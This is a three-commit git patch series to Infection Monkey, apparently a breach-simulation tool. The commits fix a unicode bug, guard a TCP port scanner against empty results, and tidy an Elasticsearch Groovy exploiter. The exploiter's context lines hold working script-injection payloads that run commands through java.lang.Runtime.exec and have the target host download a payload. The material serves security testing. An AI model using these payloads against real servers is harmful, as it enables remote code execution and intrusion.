From ac8f218586853c96b377ca1d1c57667954efa6ab Mon Sep 17 00:00:00 2001 From: Oran Nadler Date: Mon, 2 Apr 2018 01:47:15 -0700 Subject: [PATCH 1/3] fix unicode bug --- infection_monkey/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infection_monkey/config.py b/infection_monkey/config.py index 9ec784594..013380cb9 100644 --- a/infection_monkey/config.py +++ b/infection_monkey/config.py @@ -23,7 +23,7 @@ def _cast_by_example(value, example): """ example_type = type(example) if example_type is str: - return str(os.path.expandvars(value)) + return os.path.expandvars(value).encode("utf8") elif example_type is tuple and len(example) != 0: if value is None or value == tuple(None): return tuple() From 99b22cfa56d60ab89636962683479f20a7ef3dfe Mon Sep 17 00:00:00 2001 From: Daniel Goldberg Date: Mon, 2 Apr 2018 16:49:18 +0300 Subject: [PATCH 2/3] Fail gracefully in case of no open ports on Windows --- infection_monkey/network/tools.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infection_monkey/network/tools.py b/infection_monkey/network/tools.py index 9f0cb8dee..5053b6c32 100644 --- a/infection_monkey/network/tools.py +++ b/infection_monkey/network/tools.py @@ -139,7 +139,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False): "On host %s discovered the following ports %s" % (str(ip), ",".join([str(s[0]) for s in connected_ports_sockets]))) banners = [] - if get_banner: + if get_banner and (len(connected_ports_sockets) != 0): readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0) # read first BANNER_READ bytes banners = [sock.recv(BANNER_READ) if sock in readable_sockets else "" From f1bbb255cd501c41567c1c57e32787a630ccbe40 Mon Sep 17 00:00:00 2001 From: Daniel Goldberg Date: Mon, 2 Apr 2018 17:19:45 +0300 Subject: [PATCH 3/3] Fix edge case in ElasticGroovy --- infection_monkey/exploit/elasticgroovy.py | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index bf904724e..cdd3e0dcb 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -25,11 +25,11 @@ class ElasticGroovyExploiter(HostExploiter): MONKEY_RESULT_FIELD = "monkey_result" GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")' - JAVA_GET_TMP_DIR =\ + JAVA_GET_TMP_DIR = \ GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")' JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")' JAVA_CMD = GENERIC_QUERY \ - % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder @@ -139,8 +139,8 @@ class ElasticGroovyExploiter(HostExploiter): http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() if (http_thread.downloads != 1) or ( - 'ELF' not in - self.check_if_remote_file_exists_linux(target_path)): + 'ELF' not in + self.check_if_remote_file_exists_linux(target_path)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) return False return True @@ -232,5 +232,5 @@ class ElasticGroovyExploiter(HostExploiter): try: json_resp = json.loads(response.text) return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD] - except KeyError: + except (KeyError, IndexError): return None